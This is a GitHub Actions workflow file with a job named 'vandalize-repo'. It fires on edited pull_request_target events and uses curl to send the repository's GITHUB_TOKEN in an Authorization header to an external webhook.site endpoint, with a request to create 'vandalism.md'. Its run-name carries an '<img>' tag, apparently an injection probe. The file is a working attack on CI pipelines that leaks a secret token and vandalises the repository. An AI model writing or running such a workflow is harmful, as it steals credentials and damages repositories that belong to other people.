run-name: "<img> "

on:
  pull_request_target:
    types: edited

jobs:
  vandalize-repo:
    runs-on: ubuntu-latest
    steps:
      - name: Vandalize
        run: 'curl -H "Authorization: bearer $GITHUB_TOKEN" -X POST "https://webhook.site/cc752c07-de06-4a69-8d9c-48ddb5cb863b" --data ''{"message": "Create vandalism.md", "content": "TkFBIHdhcyBoZXJl"}'' '
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          REPO: ${{ github.repository }}
